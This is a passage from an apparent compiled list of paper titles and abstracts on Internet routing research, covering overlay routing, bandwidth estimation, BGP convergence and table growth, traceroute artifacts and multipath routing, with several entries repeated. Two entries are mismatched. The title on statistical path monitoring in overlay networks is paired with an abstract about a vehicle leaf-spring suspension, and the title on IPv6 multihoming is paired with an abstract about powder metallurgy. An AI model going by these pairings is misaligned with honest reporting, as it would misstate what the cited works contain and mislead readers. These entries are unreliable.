Our results show that our prototype successfully recovered from 56% of network failures. However, we also found a large number of server failures that cannot be addressed through alternative routing. ::: ::: Our research demonstrates that one-hop source routing is easy to implement, adds negligible overhead, and achieves close to the maximum benefit available to indirect routing schemes, without the need for path monitoring, history, or a-priori knowledge of any kind. --- paper_title: Bandwidth-Aware Routing in Overlay Networks paper_content: In the absence of end-to-end quality of service (QoS), overlay routing has been used as an alternative to the default best effort Internet routing. Using end-to-end network measurement, the problematic parts of the path can be bypassed, resulting in improving the resiliency and robustness to failures. Studies have shown that overlay paths can give better latency, loss rate, and TCP throughput. Overlay routing also offers flexibility as different routes can be used based on application needs. There have been very few proposals of using bandwidth as the main metric of interest, which is of great concern in media applications. We introduce our scheme BARON (Bandwidth-Aware Routing in Overlay Networks) that utilizes capacity between the end hosts to identify viable overlay paths and measures available bandwidth to select the best route. We propose our path selection approaches, and using the measurements between 174 PlanetLab nodes and over 13,189 paths, we evaluate the usefulness of overlay routes in terms of bandwidth gain. Our results show that among 658,526 overlay paths, 25% have larger bandwidth than their native IP routes, and over 86% of (source, destination) pairs have at least one overlay route with larger bandwidth than the default IP routes. We also present the effectiveness of BARON in preserving the bandwidth requirement over time for a few selected Internet paths. --- paper_title: Exploiting internet route sharing for large scale available bandwidth estimation paper_content: Recent progress in active measurement techniques has made it possible to estimate end-to-end path available bandwidth. However, how to efficiently obtain available bandwidth information for the N2 paths in a large N-node system remains an open problem. While researchers have developed coordinate-based models that allow any node to quickly and accurately estimate latency in a scalable fashion, no such models exist for available bandwidth. In this paper we introduce BRoute--a scalable available bandwidth estimation system that is based on a route sharing model. The characteristics of BRoute are that its overhead is linear with the number of end nodes in the system, and that it requires only limited cooperation among end nodes. BRoute leverages the fact that most Internet bottlenecks are on path edges, and that edges are shared by many different paths. It uses AS-level source and sink trees to characterize and infer path-edge sharing in a scalable fashion. In this paper, we describe the BRoute architecture and evaluate the performance of its components. Initial experiments show that BRoute can infer path edges with an accuracy of over 80%. In a small case study on Planetlab, 80% of the available bandwidth estimates obtained from BRoute are accurate within 50%. 
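The one-hop source routing abstract above recovers from path failures by retrying a transfer through a few randomly chosen intermediaries instead of monitoring paths. A minimal sketch of that selection policy follows; direct_fetch, relay_fetch, the ConnectionError signalling and the default k are illustrative assumptions, not details taken from the paper.

```python
import random

def fetch_with_one_hop_recovery(dest, intermediaries, direct_fetch, relay_fetch, k=4):
    """Try the direct path first; on failure, retry via up to k randomly
    chosen intermediaries (one-hop source routing)."""
    try:
        return direct_fetch(dest)
    except ConnectionError:
        for relay in random.sample(intermediaries, min(k, len(intermediaries))):
            try:
                return relay_fetch(relay, dest)   # relay forwards the request to dest
            except ConnectionError:
                continue
        raise  # all randomly chosen one-hop alternatives failed as well
```

The appeal, as the abstract notes, is that no path monitoring, history, or a-priori knowledge is required.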
--- paper_title: Dynamic Overlay Routing Based on Available Bandwidth Estimation: A Simulation Study paper_content: Dynamic overlay routing has been proposed as a way to enhance the reliability and performance of IP networks. The major premise is that overlay routing can bypass congestion, transient outages, or suboptimal paths, by forwarding traffic through one or more intermediate overlay nodes. In this paper, we perform an extensive simulation study to investigate the performance of dynamic overlay routing. In particular, we leverage recent work on available bandwidth (avail-bw) estimation, and focus on overlay routing that selects paths based on avail-bw measurements between adjacent overlay nodes. First, we compare two overlay routing algorithms, reactive and proactive, with shortest-path native routing. We show that reactive routing has significant benefits in terms of throughput and path stability, while proactive routing is better in providing flows with a larger safety margin (''headroom''), and propose a hybrid routing scheme that combines the best features of the previous two algorithms. We then examine the effect of several factors, including network load, traffic variability, link-state staleness, number of overlay hops, measurement errors, and native sharing effects. Some of our results are rather surprising. For instance, we show that a significant measurement error, even up to 100% of the actual avail-bw value, has a negligible impact on the efficiency of overlay routing. --- paper_title: Backup path allocation based on a correlated link failure probability model in overlay networks paper_content: Communication reliability is a desired property in computer networks. One key technology to increase the reliability of a communication path is to provision a disjoint backup path. One of the main challenges in implementing this technique is that two paths that are disjoint at the IP or overlay layer may share the same physical links. As a result, although we may select a disjoint backup path at the overlay layer one physical link failure may cause the failure of both the primary and the backup paths. In this paper we propose a solution to address this problem. The main idea is to take into account the correlated link failure at the overlay layer More precisely, our goal is to find a route for the backup path to minimize the joint path failure probability between the primary and the backup paths. To demonstrate the feasibility of our approach, we perform extensive evaluations under both single and double link failure models. Our results show that, in terms of robustness, our approach is near optimal and is up to 60% better than no backup path reservation and is up to 30% better than using the traditional shortest disjoint path algorithm to select the backup path. --- paper_title: How to Select a Good Alternate Path in Large Peer-to-Peer Systems? paper_content: When multiple paths are available between communicating hosts, application quality can be improved by switching among them to always use the best one. The key to such an approach is the availability of diverse paths, i.e., paths with uncorrelated performance. A promising approach for implementing the necessary path diversity is to leverage the capabilities of peer-to-peer systems. 
Peer-to-peer systems are attractive not only because their many participating nodes can act as relays for others, and therefore offer a large number of different alternate paths, but also because their distributed operation can facilitate the deployment of the required functionality. However, these advantages come at a cost, as the sheer number of alternate path choices they offer creates its own challenge. In particular, because not all choices are equally good, it is necessary to develop mechanisms for easily and rapidly identifying relay nodes that yield good alternate paths. This paper is about the formulation and evaluation of such mechanisms in the context of large peerto-peer systems. Our goal is to devise techniques that for any given destination allow nodes to quickly select a candidate relay node with as small a cost as possible in terms of how much information they need to store or process. We combine several heuristics that rely only on local routing information, and validate the resulting solution by comparing it to a number of benchmark alternatives. This comparison is carried out using both topology data from RouteView/RIPE and PlanetLab nodes, and through measurements across a large set of PlanetLab nodes. --- paper_title: On the constancy of internet path properties paper_content: Many Internet protocols and operational procedures use measurements to guide future actions. This is an effective strategy if the quantities being measured exhibit a degree of constancy: that is, in some fundamental sense, they are not changing. In this paper we explore three different notions of constancy: mathematical, operational, and predictive. Using a large measurement dataset gathered from the NIMI infrastructure, we then apply these notions to three Internet path properties: loss, delay, and throughput. Our aim is to provide guidance as to when assumptions of various forms of constancy are sound, versus when they might prove misleading. --- paper_title: Traceroute probe method and forward IP path inference paper_content: Several traceroute probe methods exist, each designed to perform better in a scenario where another fails. This paper examines the effects that the choice of probe method has on the inferred forward IP path by comparing the paths inferred with UDP, ICMP, and TCP-based traceroute methods to (1) a list of routable IP addresses, (2) a list of known routers, and (3) a list of well-known websites. We further compare methods by examining seven months of macroscopic Internet topology data collected by CAIDA's Archipelago infrastructure. We found significant differences in the topology observed using different probe methods. In particular, we found that ICMP-based traceroute methods tend to successfully reach more destinations, as well as collect evidence of a greater number of AS links. UDP-based methods infer the greatest number of IP links, despite reaching the fewest destinations. We hypothesise that some per-flow load balancers implement different forwarding policies for TCP and UDP, and run a specific experiment to confirm this hypothesis. --- paper_title: Practical Issues of Statistical Path Monitoring in Overlay Networks with Large, Rank-Deficient Routing Matrices paper_content: A conventional form of vehicle axle suspension comprises on each side of a vehicle-a leaf spring pack and a shock absorber system. A height control system may also be included. According to this invention the leaf spring pack is replaced by a single leaf spring and a pair of air springs. 
The opposite ends of the single leaf spring are shackled to the existing shackle attachments and their vehicle frame mounts. Midway between its ends the single leaf spring is connected to the adjacent axle end by the existing spring-to-axle attachment components. In order to compensate for the difference in thicknesses of leaf spring pack and the single leaf spring at their midpoints, a spacer having a vertical thickness equal to the difference in the thicknesses is mounted on top of the single thickness spring at the axle. Air spring support brackets are symmetrically mounted on the chassis frame member on opposite sides of the axle. The upper end of each air spring is attached to one of the brackets and the lower end of each air spring is attached to the single leaf spring. Preferably a-height control system is provided on each side so as to maintain the chassis at a predetermined level. Except for the single leaf spring and the spacer, the other components may be of the type used in conventional leaf spring pack suspensions. --- paper_title: Using Type-of-Relationship (ToR) Graphs to Select Disjoint Paths in Overlay Networks paper_content: Routing policies used in the Internet can be restrictive, limiting communication between source-destination pairs to one path, when often better alternatives exist. To avoid route flapping, recovery mechanisms may be dampened, making adaptation slow. Unstructured overlays have been widely proposed to mitigate the issues of path and performance failures in the Internet by routing through an indirect-path via overlay peer(s). Choice of alternate-paths in overlay networks is a challenging issue. Ensuring both availability and performance guarantees on alternate paths requires aggressive monitoring of all overlay paths using active probing; this limits scalability when the number of overlay-paths becomes large. An alternate technique to select an overlay-path is to bias its selection based on physical disjointness criteria to bypass the failure on primary-path. In this paper, we show how type-of-relationship (ToR)-Graphs can be used to select maximally-disjoint overlay-paths. --- paper_title: Heuristics for Internet map discovery paper_content: Mercator is a program that uses hop-limited probes-the same primitive used in traceroute-to infer an Internet map. It uses informed random address probing to carefully exploring the IP address space when determining router adjacencies, uses source-route capable routers wherever possible to enhance the fidelity of the resulting map, and employs novel mechanisms for resolving aliases (interfaces belonging to the same router). This paper describes the design of these heuristics and our experiences with Mercator, and presents some preliminary analysis of the resulting Internet map. --- paper_title: Detection, Understanding, and Prevention of Traceroute Measurement Artifacts paper_content: Traceroute is widely used, from the diagnosis of network problems to the assemblage of internet maps. Unfortunately, there are a number of problems with traceroute methodology, which lead to the inference of erroneous routes. This paper studies particular structures arising in nearly all traceroute measurements. We characterize them as ''loops'', ''cycles'', and ''diamonds''. We identify load balancing as a possible cause for the appearance of false loops, cycles, and diamonds, i.e., artifacts that do not represent the internet topology. 
We provide a new publicly available traceroute, called Paris traceroute, which, by controlling the packet header contents, provides a truer picture of the actual routes that packets follow. We performed measurements, from the perspective of a single source tracing towards multiple destinations, and Paris traceroute allowed us to show that many of the particular structures we observe are indeed traceroute measurement artifacts. --- paper_title: Backup path allocation based on a correlated link failure probability model in overlay networks paper_content: Communication reliability is a desired property in computer networks. One key technology to increase the reliability of a communication path is to provision a disjoint backup path. One of the main challenges in implementing this technique is that two paths that are disjoint at the IP or overlay layer may share the same physical links. As a result, although we may select a disjoint backup path at the overlay layer one physical link failure may cause the failure of both the primary and the backup paths. In this paper we propose a solution to address this problem. The main idea is to take into account the correlated link failure at the overlay layer More precisely, our goal is to find a route for the backup path to minimize the joint path failure probability between the primary and the backup paths. To demonstrate the feasibility of our approach, we perform extensive evaluations under both single and double link failure models. Our results show that, in terms of robustness, our approach is near optimal and is up to 60% better than no backup path reservation and is up to 30% better than using the traditional shortest disjoint path algorithm to select the backup path. --- paper_title: Interdomain Traffic Engineering with BGP paper_content: Traffic engineering is performed by means of a set of techniques that can be used to better control the flow of packets inside an IP network. We discuss the utilization of these techniques across interdomain boundaries in the global Internet. We first analyze the characteristics of interdomain traffic on the basis of measurements from three different Internet service providers and show that a small number of sources are responsible for a large fraction of the traffic. Across interdomain boundaries, traffic engineering relies on a careful tuning of the route advertisements sent via the border gateway protocol. We explain how this tuning can be used to control the flow of incoming and outgoing traffic, and identify its limitations. --- paper_title: Managing a portfolio of overlay paths paper_content: In recent years, several architectures have been proposed and developed for supporting streaming applications that take advantage of multiple paths through the network simultaneously. We consider the problem of computing a set of paths and the relative amounts of data conveyed through them in order to provide the desired level of performance for data streams. Given the expectation, variance, and covariance of an appropriate metric of interest for overlay links, we attempt to solve the underlying resource allocation problem by applying methods used in managing a finance portfolio. We observe that the flow allocation problem requires constrained application of these methods, and we discuss the tractability of enforcing the constraints. We finally present some simulation results to evaluate the effectiveness of our proposed techniques. 
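The portfolio-based flow allocation described in the entry above lends itself to a compact illustration. The sketch below is only a minimal interpretation of the general idea (a closed-form minimum-variance split of traffic across overlay paths); the delay statistics are invented for illustration, and the cited paper's constrained formulation would need a proper optimizer rather than this unconstrained solution.

```python
import numpy as np

# Illustrative per-path delay statistics (made-up numbers): mean delay (ms)
# and covariance of delay across three overlay paths between the same pair.
mean_delay = np.array([42.0, 55.0, 48.0])
cov = np.array([[9.0, 2.0, 1.0],
                [2.0, 16.0, 3.0],
                [1.0, 3.0, 12.0]])

def min_variance_weights(cov):
    """Closed-form minimum-variance split of traffic across paths.

    Mirrors the unconstrained Markowitz solution w = C^-1 1 / (1' C^-1 1);
    a real system would add non-negativity and capacity constraints.
    """
    ones = np.ones(cov.shape[0])
    w = np.linalg.solve(cov, ones)
    return w / w.sum()

w = min_variance_weights(cov)
print("traffic split :", np.round(w, 3))
print("expected delay:", round(float(w @ mean_delay), 1), "ms")
print("delay std dev :", round(float(np.sqrt(w @ cov @ w)), 2), "ms")
```

A deployment would refresh the mean and covariance from ongoing measurements and re-solve periodically, which is what makes the "portfolio" framing attractive for overlay path management.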
--- paper_title: On characterizing BGP routing table growth paper_content: The sizes of the BGP routing tables have increased by an order of magnitude over the last six years. This dramatic growth of the routing table can decrease the packet forwarding speed and demand more router memory space. In this paper, we explore the extent that various factors contribute to the routing table size and characterize the growth of each contribution. We begin with measurement study using routing tables of Oregon Route Views server to determine the contributions of multi-homing, load balancing, address fragmentation, and failure to aggregate to routing table size. We find that the contribution of address fragmentation is the greatest and is three times that of multi-homing or load balancing. The contribution of failure to aggregate is the least. Although multi-homing and load balancing contribute less to routing table size than address fragmentation does, we observe that the contribution of multi-homing and that of load balancing grow faster than the routing table does and that the load balancing has surpassed multihoming becoming the fastest growing contributor. Moreover, we find that both load balancing and multi-homing contribute to routing table growth by introducing more prefixes of length greater than 17 but less than 25, which is the fastest growing class of prefixes. Next, we compare the growth of the routing table to the expanding of IP addresses that can be routed and conclude that the growth of routable IP addresses is much slower than that of routing table size. Last, we demonstrate that our findings based on the view derived from the Oregon server are accurate through evaluation using additional 15 routing tables collected from different locations in the Internet. --- paper_title: R-BGP: Staying Connected in a Connected World paper_content: Many studies show that, when Internet links go up or down, the dynamics of BGP may cause several minutes of packet loss. The loss occurs even when multiple paths between the sender and receiver domains exist, and is unwarranted given the high connectivity of the Internet. ::: ::: Our objective is to ensure that Internet domains stay connected as long as the underlying network is connected. Our solution, R-BGP works by pre-computing a few strategically chosen failover paths. R-BGP provably guarantees that a domain will not become disconnected from any destination as long as it will have a policy-compliant path to that destination after convergence. Surprisingly, this can be done using a few simple and practical modifications to BGP, and, like BGP, requires announcing only one path per neighbor. Simulations on the AS-level graph of the current Internet show that R-BGP reduces the number of domains that see transient disconnectivity resulting from a link failure from 22% for edge links and 14% for core links down to zero in both cases. --- paper_title: Best-path vs. multi-path overlay routing paper_content: Time-varying congestion on Internet paths and failures due to software, hardware, and configuration errors often disrupt packet delivery on the Internet.Many aproaches to avoiding these problems use multiple paths between two network locations. 
These approaches rely on a path-independence assumption in order to work well; i.e., they work best when the problems on different paths between two locations are uncorrelated in time.This paper examines the extent to which this assumption holds on the Internet by analyzing 14 days of data collected from 30 nodes in the RON testbed. We examine two problems that manifest themselves---congestion-triggered loss and path failures---and find that the chances of losing two packets between the same hosts is nearly as high when those packets are sent through an intermediate node (60%) as when they are sent back-to-back on the same path (70%). In so doing, we also compare two different ways of taking advantage of path redundancy proposed in the literature: mesh routing based on packet replication, and reactive routing based on adaptive path selection. --- paper_title: Exploiting routing redundancy via structured peer-to-peer overlays paper_content: Structured peer-to-peer overlays provide a natural infrastructure for resilient routing via efficient fault detection and precomputation of backup paths. These overlays can respond to faults in a few hundred milliseconds by rapidly shifting between alternate routes. In this paper, we present two adaptive mechanisms for structured overlays and illustrate their operation in the context of Tapestry, a fault-resilient overlay from Berkeley. We also describe a transparent, protocol-independent traffic redirection mechanism that tunnels legacy application traffic through overlays. Our measurements of a Tapestry prototype show it to be a highly responsive routing service, effective at circumventing a range of failures while incurring reasonable cost in maintenance bandwidth and additional routing latency. --- paper_title: MIRO: multi-path interdomain routing paper_content: The Internet consists of thousands of independent domains with different, and sometimes competing, business interests. However, the current interdomain routing protocol (BGP) limits each router to using a single route for each destination prefix, which may not satisfy the diverse requirements of end users. Recent proposals for source routing offer an alternative where end hosts or edge routers select the end-to-end paths. However, source routing leaves transit domains with very little control and introduces difficult scalability and security challenges. In this paper, we present a multi-path inter-domain routing protocol called MIRO that offers substantial flexiility, while giving transit domains control over the flow of traffic through their infrastructure and avoiding state explosion in disseminating reachability information. In MIRO, routers learn default routes through the existing BGP protocol, and arbitrary pairs of domains can negotiate the use of additional paths (bound to tunnels in the data plane) tailored to their special needs. MIRO retains the simplicity of BGP for most traffic, and remains backwards compatible with BGP to allow for incremental deployability. Experiments with Internet topology and routing data illustrate that MIRO offers tremendous flexibility for path selection with reasonable overhead. --- paper_title: Improving the Reliability of Internet Paths with One-hop Source Routing paper_content: Recent work has focused on increasing availability in the face of Internet path failures. To date, proposed solutions have relied on complex routing and path-monitoring schemes, trading scalability for availability among a relatively small set of hosts. 
::: ::: This paper proposes a simple, scalable approach to recover from Internet path failures. Our contributions are threefold. First, we conduct a broad measurement study of Internet path failures on a collection of 3,153 Internet destinations consisting of popular Web servers, broad-band hosts, and randomly selected nodes. We monitored these destinations from 67 PlanetLab vantage points over a period of seven days, and found availabilities ranging from 99.6% for servers to 94.4% for broadband hosts. When failures do occur, many appear too close to the destination (e.g., last-hop and end-host failures) to be mitigated through alternative routing techniques of any kind. Second, we show that for the failures that can be addressed through routing, a simple, scalable technique, called one-hop source routing, can achieve close to the maximum benefit available with very low overhead. When a path failure occurs, our scheme attempts to recover from it by routing indirectly through a small set of randomly chosen intermediaries. ::: ::: Third, we implemented and deployed a prototype one-hop source routing infrastructure on PlanetLab. Over a three day period, we repeatedly fetched documents from 982 popular Internet Web servers and used one-hop source routing to attempt to route around the failures we observed. Our results show that our prototype successfully recovered from 56% of network failures. However, we also found a large number of server failures that cannot be addressed through alternative routing. ::: ::: Our research demonstrates that one-hop source routing is easy to implement, adds negligible overhead, and achieves close to the maximum benefit available to indirect routing schemes, without the need for path monitoring, history, or a-priori knowledge of any kind. --- paper_title: Source selectable path diversity via routing deflections paper_content: We present the design of a routing system in which end-systems set tags to select non-shortest path routes as an alternative to explicit source routes. Routers collectively generate these routes by using tags as hints to independently deflect packets to neighbors that lie off the shortest-path. We show how this can be done simply, by local extensions of the shortest path machinery, and safely, so that loops are provably not formed. The result is to provide end-systems with a high-level of path diversity that allows them to bypass unde-sirable locations within the network. Unlike explicit source routing, our scheme is inherently scalable and compatible with ISP policies because it derives from the deployed Internet routing. We also sug-gest an encoding that is compatible with common IP usage, making our scheme incrementally deployable at the granularity of individual routers. --- paper_title: Improving the Reliability of Internet Paths with One-hop Source Routing paper_content: Recent work has focused on increasing availability in the face of Internet path failures. To date, proposed solutions have relied on complex routing and path-monitoring schemes, trading scalability for availability among a relatively small set of hosts. ::: ::: This paper proposes a simple, scalable approach to recover from Internet path failures. Our contributions are threefold. First, we conduct a broad measurement study of Internet path failures on a collection of 3,153 Internet destinations consisting of popular Web servers, broad-band hosts, and randomly selected nodes. 
We monitored these destinations from 67 PlanetLab vantage points over a period of seven days, and found availabilities ranging from 99.6% for servers to 94.4% for broadband hosts. When failures do occur, many appear too close to the destination (e.g., last-hop and end-host failures) to be mitigated through alternative routing techniques of any kind. Second, we show that for the failures that can be addressed through routing, a simple, scalable technique, called one-hop source routing, can achieve close to the maximum benefit available with very low overhead. When a path failure occurs, our scheme attempts to recover from it by routing indirectly through a small set of randomly chosen intermediaries. ::: ::: Third, we implemented and deployed a prototype one-hop source routing infrastructure on PlanetLab. Over a three day period, we repeatedly fetched documents from 982 popular Internet Web servers and used one-hop source routing to attempt to route around the failures we observed. Our results show that our prototype successfully recovered from 56% of network failures. However, we also found a large number of server failures that cannot be addressed through alternative routing. ::: ::: Our research demonstrates that one-hop source routing is easy to implement, adds negligible overhead, and achieves close to the maximum benefit available to indirect routing schemes, without the need for path monitoring, history, or a-priori knowledge of any kind. --- paper_title: Network sensitivity to hot-potato disruptions paper_content: Hot-potato routing is a mechanism employed when there are multiple (equally good) interdomain routes available for a given destination. In this scenario, the Border Gateway Protocol (BGP) selects the interdomain route associated with the closest egress point based upon intradomain path costs. Consequently, intradomain routing changes can impact interdomain routing and cause abrupt swings of external routes, which we call hot-potato disruptions. Recent work has shown that hot-potato disruptions can have a substantial impact on large ISP backbones and thereby jeopardize the network robustness. As a result, there is a need for guidelines and tools to assist in the design of networks that minimize hot-potato disruptions. However, developing these tools is challenging due to the complex and subtle nature of the interactions between exterior and interior routing. In this paper, we address these challenges using an analytic model of hot-potato routing that incorporates metrics to evaluate network sensitivity to hot-potato disruptions. We then present a methodology for computing these metrics using measurements of real ISP networks. We demonstrate the utility of our model by analyzing the sensitivity of a large AS in a tier~1 ISP network. --- paper_title: Source selectable path diversity via routing deflections paper_content: We present the design of a routing system in which end-systems set tags to select non-shortest path routes as an alternative to explicit source routes. Routers collectively generate these routes by using tags as hints to independently deflect packets to neighbors that lie off the shortest-path. We show how this can be done simply, by local extensions of the shortest path machinery, and safely, so that loops are provably not formed. The result is to provide end-systems with a high-level of path diversity that allows them to bypass unde-sirable locations within the network. 
Unlike explicit source routing, our scheme is inherently scalable and compatible with ISP policies because it derives from the deployed Internet routing. We also sug-gest an encoding that is compatible with common IP usage, making our scheme incrementally deployable at the granularity of individual routers. --- paper_title: The Rich-Club Phenomenon In The Internet Topology paper_content: We show that the Internet topology at the autonomous system (AS) level has a rich-club phenomenon. The rich nodes, which are a small number of nodes with large numbers of links, are very well connected to each other. The rich-club is a core tier that we measured using the rich-club connectivity and the node-node link distribution. We obtained this core tier without any heuristic assumption between the ASs. The rich-club phenomenon is a simple qualitative way to differentiate between power law topologies and provides a criterion for new network models. To show this, we compared the measured rich-club of the AS graph with networks obtained using the Baraba/spl acute/si-Albert (BA) scale-free network model, the Fitness BA model and the Inet-3.0 model. --- paper_title: Algebra-Based Scalable Overlay Network Monitoring: Algorithms, Evaluation, and Applications paper_content: Overlay network monitoring enables distributed Internet applications to detect and recover from path outages and periods of degraded performance within seconds. For an overlay network with n end hosts, existing systems either require O(n2) measurements, and thus lack scalability, or can only estimate the latency but not congestion or failures. Our earlier extended abstract [Y. Chen, D. Bindel, and R. H. Katz, "Tomography-based overlay network monitoring," Proceedings of the ACM SIGCOMM Internet Measurement Conference (IMC), 2003] briefly proposes an algebraic approach that selectively monitors k linearly independent paths that can fully describe all the O(n2) paths. The loss rates and latency of these k paths can be used to estimate the loss rates and latency of all other paths. Our scheme only assumes knowledge of the underlying IP topology, with links dynamically varying between lossy and normal. In this paper, we improve, implement, and extensively evaluate such a monitoring system. We further make the following contributions: i) scalability analysis indicating that for reasonably large n (e.g., 100), the growth of k is bounded as O(n log n), ii) efficient adaptation algorithms for topology changes, such as the addition or removal of end hosts and routing changes, iii) measurement load balancing schemes, iv) topology measurement error handling, and v) design and implementation of an adaptive streaming media system as a representative application. Both simulation and Internet experiments demonstrate we obtain highly accurate path loss rate estimation while adapting to topology changes within seconds and handling topology errors. --- paper_title: The paths toward IPv6 multihoming paper_content: A powder metallurgical method of producing metal bodies using spherical powder, produced by inert gas atomization, from magnetizable material with a particle size distribution closely approximating the so called Fuller curve for maximum density packing of spherical particles. Said powder is magnetized and filled into a form, which may take place before or after magnetization, said mixed and magnetized powder then sintered in said form with the exclusion of air, to produce a sintered body without communicating porosity. 
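The algebra-based monitoring idea cited a few entries above (probe only a set of linearly independent paths and infer the quality of all the rest) can be sketched with a toy routing matrix. The matrix, link delays, and greedy basis selection below are illustrative assumptions, not the cited system's actual algorithms or data.

```python
import numpy as np

# Toy path-link routing matrix G: rows are overlay paths, columns are IP links;
# entry 1 means the path traverses the link. All numbers are illustrative only.
G = np.array([[1, 1, 0, 0],
              [0, 1, 1, 0],
              [1, 0, 1, 0],
              [1, 1, 1, 1],
              [0, 0, 1, 1]], dtype=float)

true_link_delay = np.array([5.0, 8.0, 3.0, 10.0])   # hidden ground truth (ms)

def select_basis_paths(G):
    """Greedily pick a set of rows (paths) that spans the row space of G."""
    basis = []
    for i in range(G.shape[0]):
        cand = basis + [i]
        if np.linalg.matrix_rank(G[cand]) == len(cand):
            basis.append(i)
    return basis

basis = select_basis_paths(G)                  # the paths we actually probe
y_measured = G[basis] @ true_link_delay        # stand-in for real measurements

# Minimum-norm link-delay estimate from the measured paths only, then
# infer the delay of every overlay path without probing it directly.
x_hat, *_ = np.linalg.lstsq(G[basis], y_measured, rcond=None)
print("probed paths        :", basis)
print("inferred path delays:", np.round(G @ x_hat, 2))
print("true path delays    :", G @ true_link_delay)
```

Because every unprobed row is a linear combination of the basis rows, the inferred values match the true path delays exactly in this noiseless toy case; with measurement noise the same machinery gives least-squares estimates.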
--- paper_title: MIRO: multi-path interdomain routing paper_content: The Internet consists of thousands of independent domains with different, and sometimes competing, business interests. However, the current interdomain routing protocol (BGP) limits each router to using a single route for each destination prefix, which may not satisfy the diverse requirements of end users. Recent proposals for source routing offer an alternative where end hosts or edge routers select the end-to-end paths. However, source routing leaves transit domains with very little control and introduces difficult scalability and security challenges. In this paper, we present a multi-path inter-domain routing protocol called MIRO that offers substantial flexiility, while giving transit domains control over the flow of traffic through their infrastructure and avoiding state explosion in disseminating reachability information. In MIRO, routers learn default routes through the existing BGP protocol, and arbitrary pairs of domains can negotiate the use of additional paths (bound to tunnels in the data plane) tailored to their special needs. MIRO retains the simplicity of BGP for most traffic, and remains backwards compatible with BGP to allow for incremental deployability. Experiments with Internet topology and routing data illustrate that MIRO offers tremendous flexibility for path selection with reasonable overhead. --- paper_title: Path-Computation-Element-Based Architecture for Interdomain MPLS/GMPLS Traffic Engineering: Overview and Performance paper_content: The Path Computation Element Working Group at the Internet Engineering Task Force is chartered to specify a PCE-based architecture for the path computation of interdomain MPLS- and GMPLS-based traffic engineered label switched paths. In this architecture, path computation does not occur at the head-end LSR, but on another path computation entity that may not be physically located on the head-end LSR. This method is greatly different from the traditional "per-domain" approach to path computation. This article presents analysis and results that compare performance of the PCE architecture with the current state-of-the-art approach. Detailed simulations are undertaken on varied and realistic scenarios where preliminary results show several performance benefits from the deployment of PCE. To provide a complete overview of significant development taking place in this area, milestones and progress at the IETF PCE WG are also discussed. --- paper_title: An evaluation of IP-based fast reroute techniques paper_content: Today, IP-based networks are used to carry all types of traffic, from the traditional best-effort Internet access to traffic with much more stringent requirements such as realtime voice or video services and Virtual Private Networks. Some of those services have strong requirements in terms of restoration time in case of failure. When a link or a router fails in an IP network, the routers adjacent to the failing ressource must react by distributing new routing information to allow each router of the network to update its routing table. A realistic estimate of the convergence time of a tuned intradomain routing protocol in a large network is a few hundred of milliseconds [1]. For some mission critical services like voice or video over IP, achieving a restoration time in the order of a few tens of milliseconds after a failure is important [2]. In this paper, we first present several techniques that can be used to achieve such a short restoration time. 
While most of the work on fast restoration has focussed on MPLS-based solutions [2], recent work indicate that fast restoration techniques can be developed also for pure IP networks. Recently, the RTGWG working group of the IETF started to work actively on this problem and several fast reroute techniques are being discussed. However, as of today, no detailed evaluation of the various proposed IP-based fast reroute techniques has been published. The goal of this short paper is to firstly provide a brief overview of fast restoration techniques suitable for pure IP networks, in section 2. Then, in section 3, we evaluate by simulation how many links can be protected by each technique in large ISP networks based on their actual topology. This coverage is an important issue as some techniques cannot protect all links from failures. --- paper_title: Exploring the performance benefits of end-to-end path switching paper_content: This paper explores the feasibility of improving the performance of end-to-end data transfers between different sites through path switching. Our study is focused on both the logic that controls path switching decisions and the configurations required to achieve sufficient path diversity. Specifically, we investigate two common approaches offering path diversity - multi-homing and overlay networks - and investigate their characteristics in the context of a representative wide-area testbed. We explore the end-to-end delay and loss characteristics of different paths and find that substantial improvements can potentially be achived by path switching, especially in lowering end-to-end losses. Based on this assessment, we develop a simple path-switching mechanism capable of realizing those performance improvements. Our experimental study demonstrates that substantial performance improvements are indeed achievable using this approach. --- paper_title: On characterizing BGP routing table growth paper_content: The sizes of the BGP routing tables have increased by an order of magnitude over the last six years. This dramatic growth of the routing table can decrease the packet forwarding speed and demand more router memory space. In this paper, we explore the extent that various factors contribute to the routing table size and characterize the growth of each contribution. We begin with measurement study using routing tables of Oregon Route Views server to determine the contributions of multi-homing, load balancing, address fragmentation, and failure to aggregate to routing table size. We find that the contribution of address fragmentation is the greatest and is three times that of multi-homing or load balancing. The contribution of failure to aggregate is the least. Although multi-homing and load balancing contribute less to routing table size than address fragmentation does, we observe that the contribution of multi-homing and that of load balancing grow faster than the routing table does and that the load balancing has surpassed multihoming becoming the fastest growing contributor. Moreover, we find that both load balancing and multi-homing contribute to routing table growth by introducing more prefixes of length greater than 17 but less than 25, which is the fastest growing class of prefixes. Next, we compare the growth of the routing table to the expanding of IP addresses that can be routed and conclude that the growth of routable IP addresses is much slower than that of routing table size. 
Last, we demonstrate that our findings based on the view derived from the Oregon server are accurate through evaluation using additional 15 routing tables collected from different locations in the Internet. --- paper_title: Improved BGP convergence via ghost flushing paper_content: Labovitz et al. (2001) and Labovitz et al. (2000) noticed that sometimes it takes border gateway protocol (BGP) a substantial amount of time and messages to converge and stabilize following the failure of some node in the Internet. In this paper, we suggest a minor modification to BGP that eliminates the problem pointed out and substantially reduces the convergence time and communication complexity of BGP. Roughly speaking, our modification ensures that bad news (the failure of a node/edge) propagate fast, while good news (the establishment of a new path to a destination) propagate somewhat slower. This is achieved in BGP by allowing withdrawal messages to propagate with no delay as fast as the network forward them, while announcements propagate as they do in BGP with a delay at each node of one minRouteAdver (except for the first wave of announcements). As a by product of this work, a new stateless mechanism to overcome the counting to infinity problem is provided, which compares favorably with other known stateless mechanisms (in RIP and IGRP). --- paper_title: Source selectable path diversity via routing deflections paper_content: We present the design of a routing system in which end-systems set tags to select non-shortest path routes as an alternative to explicit source routes. Routers collectively generate these routes by using tags as hints to independently deflect packets to neighbors that lie off the shortest-path. We show how this can be done simply, by local extensions of the shortest path machinery, and safely, so that loops are provably not formed. The result is to provide end-systems with a high-level of path diversity that allows them to bypass unde-sirable locations within the network. Unlike explicit source routing, our scheme is inherently scalable and compatible with ISP policies because it derives from the deployed Internet routing. We also sug-gest an encoding that is compatible with common IP usage, making our scheme incrementally deployable at the granularity of individual routers. --- paper_title: Internet connectivity at the AS-level: an optimization-driven modeling approach paper_content: Two ASs are connected in the Internet AS graph only if they have a business "peering relationship." By focusing on the AS subgraph ASPC whose links represent provider-customer relationships, we develop a new optimization-driven model for Internet growth at the ASPC level. The model's defining feature is an explicit construction of a novel class of intuitive, multi-objective, local optimizations by which the different customer ASs determine in a fully distributed and decentralized fashion their "best" 